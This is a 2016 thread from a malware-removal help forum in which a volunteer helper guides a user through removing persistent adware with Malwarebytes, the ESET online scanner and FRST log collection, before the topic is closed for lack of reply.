Got your reply and really appreciate your help with my problem. My computer is running a little funny, I'm seeing a lot of pop-ups and Chrome is running funny, not allowing me to print some documents. Geeks to Go is brand new to me and I'm excited you're going to be helping me. My plan is to uninstall the programs you identified first and then work through your other instructions. Thank you again for your help and I'll keep you posted on my progress.

Best regards,

CMSpears

#5
cmspears

Posted 13 January 2016 - 08:13 PM

New Member

Topic Starter
Member
4 posts

Hi Bruce1270,

Hope you're having a grand day! I uninstalled the programs as requested and all uninstalled fine except Get-a-Clip, which is still there. I used the express uninstall but there is a custom uninstall that that warns expert users only. I haven't tried to run that version of the uninstall. My computer is already running faster thanks to your awesome help. On Saturday I'll be continuing to work my way through your list and I'll update you then. Thank you again for your help!B

est regards,

Charlie Spears

#6
Bruce1270

Posted 14 January 2016 - 06:48 AM

Trusted Helper

Malware Removal
1,714 posts

Ok. Thanks for the update.

#7
cmspears

Posted 17 January 2016 - 08:18 PM

New Member

Topic Starter
Member
4 posts

Hi Bruce1270,

I finished doing all the things you told me to last night and my computer was running fine, even though I wasn't able to completely get rid of "get a clip". However, Get a clip came back this evening, but it no longer shows up on my installed software in control panel. Attached are fixlog.txt and adwcleaner.txt.

I plan to rerun ADWCleaner. Thank you again for all your help.

Best regards,

Charlie Spears

Attached Files

Fixlog.txt 36.6KB 201 downloads
AdwCleanerC1.txt 5.81KB 209 downloads
AdwCleanerS1.txt 5.41KB 218 downloads

#8
Bruce1270

Posted 18 January 2016 - 01:43 PM

Trusted Helper

Malware Removal
1,714 posts

Hi cmspears

I plan to rerun ADWCleaner

You won't need to do this again. Please follow the next set of instructions below.

Step1 - Scan with Malwarebytes

Please download Malwarebytes' Anti-Malware from Here or Here
Double-click on mbam-setup-version-number.exe to install the application.
Before clicking Finish perform the following actions --

Un-check the box beside Enable free trial of Malwarebytes Anti-Malware Premium.
Check the box beside Launch Malwarebytes Anti-Malware

Once the program has loaded, The MBAM dashboard may appear with an alert to update - click the button Fix Now;

Navigate to the Settings tab > Detection and Protection and ensure all the boxes under Detection Options are checked.

Return to the Dashboard click on Scan Now;

If threats are detected, make sure everything is set to Quarantine and click on Apply actions. If the program asks to reboot your PC, let it do so;
On completion of the scan click on History > Application Log. After that click on the top Scan Log > Export, select Text File and save the log to your Desktop;
Copy and Paste the contents of the log in your next reply.

Step2 - ESET on line scan

Vista / 7 users: You will need to to right-click on the either the IE or FF icon in the Start Menu or Quick Launch Bar on the Taskbar and select Run as Administrator from the context menu.

Note: You can use either Internet Explorer or Mozilla FireFox for this Scan.

Please go here then click on .
You will however need to disable your current installed Anti-Virus, how to do so can be read here.

If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

All of the following instructions work with either Internet Explorer or Mozilla FireFox.

Select the option YES, I accept the Terms of Use then click on Start.
When prompted allow Add-On/Active X to install.
Make sure Enable detection of potentially unwanted applications is selected.
Click the Advanced Settings link.
Make sure Remove found threats is NOT checked.
Make sure Scan archives IS checked.
Make sure Scan for potentially unsafe applications IS checked.
Make sure Enable Anti-Stealth technology IS checked
Now click on Start.
The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
When completed the Online Scan will begin automatically. The scan may take several hours.
Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
When completed make sure you first copy the logfile located at C:\Program Files (x86)\ESET\Esetonlinescanner\log.txt.
Copy and paste that log as a reply to this topic.
When completed select Uninstall application on close.
Now click on Finish.

Note: Do not forget to re-enable your Anti-Virus application after running the above scan!

Step3 - Fresh FRST logs
Please run Farbars Recovery Scan Tool again. Run FRST by right clicking on it and selecting Run as Administrator. Allow it to update if it wants to.
Please tick the Addition.txt box under Optional Scan.
Press Scan button.
It will make logs FRST.txt & Addition.txt in the same directory the tool is run.
Please copy and paste the FRST.txt and Addition.txt to your reply.

Things for your next post:
MBAM log file
ESET log
FRST.txt and Addition.txt
What issues remain with your computer?

#9
Naathim

Posted 23 January 2016 - 05:02 AM

GeekU Minion

Expert
4,568 posts

<p>Due to lack of feedback, this topic has been closed.<br /><br />If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.</p>